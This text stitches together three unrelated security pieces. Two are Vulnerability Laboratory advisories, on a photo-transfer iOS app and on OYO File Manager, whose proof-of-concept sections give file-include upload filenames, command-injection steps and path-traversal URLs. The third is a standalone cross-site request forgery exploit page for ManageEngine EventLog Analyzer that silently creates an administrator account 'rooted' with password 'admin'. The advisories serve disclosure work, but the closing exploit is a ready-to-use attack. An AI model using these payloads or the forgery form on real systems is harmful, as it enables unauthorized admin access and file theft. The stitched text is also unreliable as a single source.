Vulnerability Laboratory ID (VL-ID):
====================================
1492
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
Transfer your photo without usb. The best wireless photo transfer app on the App Store.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/wireless-photo-transfer/id900376882 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official wireless photo transfer mobile v3.0 iOS application.
Vulnerability Disclosure Timeline:
==================================
2015-05-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Yan Xing
Product: Wireless Photo Transfer - iOS Mobile Web Application 3.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official wireless photo transfer mobile v3.0 iOS application.
The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `album-title` value of the `file upload` module. Remote attackers are able to inject
own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application.
The local file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker
is able to inject the lfi payload by usage of the wifi interface or local file sync function. Attackers are also able to exploit
the filename issue in combination with persistent injected script code to execute different malicious attack requests. The attack
vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Submit (Upload)
Vulnerable Parameter(s):
[+] filename (album-title)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:80/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: #1 Index File Dir Listing (album-title)
<div class="album-folder">
<div class="album-number">2 items</div>
<div class="album-title">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a></a></div><a>
</a><a href="/group/2/0/100"><img class="album-overlay" alt="" src="/cvab-overlay.png" height="160" width="140">
<img class="album-thumb" alt="" src="/api/group/poster/2" height="90" width="90"></a>
<div class="album-folder-img"><img alt="" src="/cvab.png" height="160" width="140"></div>
</div>
PoC: #2 Topic Album (Album Title - album_info_intro_driver)
<div class="top-section">
<div id="intro">
<div class="divider">
<h1 class="strong" id="album_info_intro_driver">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a>(0-2)</a></h1><a>
<div class="pagination"></div>
</a></div><a>
</a></div><a>
</a><div class="centered"><a>
</a><a class="button-2 ui-glossy rad-l" href="javascript:location.reload(true)">Refresh</a>
<a class="button-2 ui-glossy rad-r" href="javascript:downloadAllSelection()">Download ZIP</a>
</div>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:80/upload.html
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/groups]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------8397114799830
Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]pentesting.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:80/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[210] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[210]
Connection[keep-alive]
Date[Sat, 09 May 2015 15:21:30 GMT]
Reference(s):
http://localhost:80/groups
http://localhost:80/upload.html
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable album-title value. Encode also the local app input field for sync.
Restrict the filename input and disallow special chars to prevent further arbitrary file upload attacks. Filter and encode also the vulnerable output
values in the mobile wifi interface (file dir) application.
Security Risk:
==============
The security risk of the local file include web vulnerability in the wifi network interface album-title value is estimated as high. (CVSS 6.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1494
Release Date:
=============
2015-05-18
Vulnerability Laboratory ID (VL-ID):
====================================
1493
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
OYO File Manager, helps you to manage files in your mobile from your computer over wifi, without USB cable. Also, view your photo albums, play songs and videos.
Store files in drive page and do all the file operations, such as Create, Move, Delete, Edit, Copy, Rename, Zip, unzip, and get information about file.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/oyo-file-manager/id981145759 & https://play.google.com/store/apps/details?id=com.whatbig.filemanager )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research team discovered multiple Vulnerabilities in the official OYO File Manager v1.1 iOS & Android mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Balaji Rajan
Product: OYO File Manager - iOS & Android 1.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1 Local File Include Vulnerability
A local file include web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The file include vulnerability allows remote attackers to unauthorized include local file/path requests to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload(GCDWebUploader)` module. Attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the local file include request by usage of the
`wifi interface` in connection with the vulnerable file upload POST method request. Injects are also possible via local file sync function.
Local attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] upload (GCDWebUploader)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
1.2 Local Command Injection Vulnerability
A local command inject web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The issue allows remote attackers to inject own commands by usage of stable device values to compromise the ios or android mobile web-application.
The command inject vulnerability is located in the vulnerable `devicename` value of the `index` module. Local attackers are able to inject own
own malicious system specific commands to requests the vulnerable `devicename` value. The devicename value is displayed in the header location
of the file dir index module. The execution point is in the main index context and the injection point is the local device to app sync.
The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account.
Local attackers are also able to exploit the devicename validation issue in combination with persistent injected script codes.
The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6.
Exploitation of the command/path inject vulnerability requires a low privileged ios/android device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands to compromise the mobile Android/iOS application
or the connected device components.
Request Method(s):
[+] [SYNC]
Vulnerable Module(s):
[+] Path Listing
Vulnerable Parameter(s):
[+] devicename
1.3 Remote Path Traversal Vulnerability
A Path Traveral web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The security vulnerability allows remote attackers to unauthorized request system path variables to compromise the mobile application or device.
The vulnerability is located in the `path` value of the `open and list` interface module. Remote attackers are able to change the path variable
to unauthorized request device files or directories. The vulnerability can be exploited by local or remote attackers without user interaction.
The attack vector is located on the application-side of the service and the request method to execute is GET (client-side).
The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction.
Successful exploitation of the vulnerability results in mobile application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] open
[+] list
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the interface
2. Start a session tamper
3. Upload a reandom file
4. Change in the upload POST method request the vulnerable filename to a local file variable
Note: The website reloads
5. The execution occurs in the main file dir index were the upload has been replaced
6. Successful reproduce of the mobile web vulnerability!
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/upload
Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[2] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Content-Length[831]
Content-Type[multipart/form-data; boundary=---------------------------33361466725643]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
POST_DATA[-----------------------------33361466725643
Content-Disposition: form-data; name="path"/test23/
-----------------------------33361466725643
Content-Disposition: form-data; name="files[]"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]testfile.png"
Content-Type: image/png
- Response
Status=OK - 200
Server=GCDWebUploader
Cache-Control=no-cache
Content-Length=2
Content-Type=application/json
Connection=Close
Date=Tue, 12 May 2015 12:24:23 GMT
Reference(s):
http://localhost/upload
1.2
The local command inject web vulnerability can be exploited by local attackers with low privilege application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the android or ios application to your device
2. Start the application
3. Change the local devicename value in the ios settings to a own payload string (local command inject)
4. Save the settings
5. Open the wifi interface and watch the index webserver site
6. The execution occurs in the header location of the webpage were the devicename value is visible
6. Successful reproduce of the mobile web vulnerability!
PoC:
<spna><img src="img/OYO.png" alt="OYO" style="margin-left:-30px;" height="87" width="87"><span> </span>
<span style="font-size:20px;">[LOCAL COMMAND INJECT VULNERABILITY!]23</span> <span style="font-size: 15px;color: #CCCCCC;">IOS Version 8.3</span>
<span style="float:right;font-size:18px;width:400px;">
<div class="progress">
<div class="progress-bar progress-bar-success" role="progressbar" aria-valuenow="1394098176.00" aria-valuemin="0" aria-valuemax="12.74" style="width:95.22%">
25.89 GB used</div>
<!-- <span style="font-size:10px;padding-left:20px;padding-bottom:5px;"> 1.30 GB Free Space</span>-->
<!-- Drag & drop files OR Just upload your Files-->
<div class="progress-bar progress-bar-warning" role="progressbar" aria-valuenow="25.89 GB" aria-valuemin="0" aria-valuemax="12.74" style="width:4.78%">
1.30 GB free space
</div></div></span></spna>
1.3
the path traversal web vulnerability can be exploited by remote attackers without user interaction or privilege web application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload(s)
http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
http://localhost/open?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
http://localhost/download?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[59] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Server[GCDWebUploader]
Cache-Control[no-cache]
Content-Length[59]
Content-Type[application/json]
Connection[Close]
Date[Tue, 12 May 2015 12:24:25 GMT]
14:21:43.214[9ms][total 9ms] Status: 200[OK]
GET http://localhost/open?path=/%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_NORMAL] Größe des Inhalts[538] Mime Type[image/png]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Etag[8831597/1431433463/0]
Last-Modified[Tue, 12 May 2015 12:24:23 GMT]
Server[GCDWebUploader]
Content-Type[image/png]
Content-Length[538]
Connection[Close]
Date[Tue, 12 May 2015 12:24:25 GMT]
Cache-Control[no-cache]
Reference(s):
http://localhost/list?path=
http://localhost/open?path=
http://localhost/download?path=
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request.
Restrict the input and disallow special chars. Parse the output in the file dir index list to prevent local file include attacks via upload.
1.2
Restrict the devicename value and disallow special chars. Encode the devicename value to prevent local command injection attacks.
1.3
The directory traversal web vulnerability can be patched by a secure restriction and parse of the path name value in the open and list module context.
Encode the input of files to folders and disallow special chars. Implement a whitelist or a exception to prevent unauthorized path value requests via GET method.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the filename value of the manager is estimated as high. (CVSS 6.5)
1.2
The security risk of the local command inject web vulnerability in the devicename value of the manager is estimated as high. (CVSS 5.6)
1.3
The security risk of the path traversal web vulnerability in the path value of the manager is estimated as high. (CVSS 6.9)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
<!--
[+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site
Request Forgery Exploit
[+] Date: 31/03/2015
[+] Exploit Author: Akash S. Chavan
[+] Vendor Homepage: https://www.manageengine.com/
[+] Software Link:
https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
[+] Version: Version: 10.0, Build Number: 10001
[+] Tested on: Windows 8.1/PostgreSQL
-->
<html>
<body>
<form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST">
<input type="hidden" name="domainId" value="" />
<input type="hidden" name="roleId" value="" />
<input type="hidden" name="addField" value="true" />
<input type="hidden" name="userType" value="Administrator" />
<input type="hidden" name="userName" value="rooted" />
<input type="hidden" name="pwd1" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="userGroup" value="Administrator" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="AddSubmit" value="Add User" />
<input type="hidden" name="alpha" value="" />
<input type="hidden" name="userIds" value="" />
<input type="hidden" name="roleName" value="" />
<input type="hidden" name="selDevices" value="" />
<input type="hidden" name="doAction" value="" />
<input type="hidden" name="productName" value="eventlog" />
<input type="hidden" name="licType" value="Prem" />
<input type="hidden" name="next" value="" />
<input type="hidden" name="currentUserId" value="1" />
<input type="hidden" name="isAdminServer" value="false" />
<input type="submit" value="Click Me" />
</form>
</body>
</html>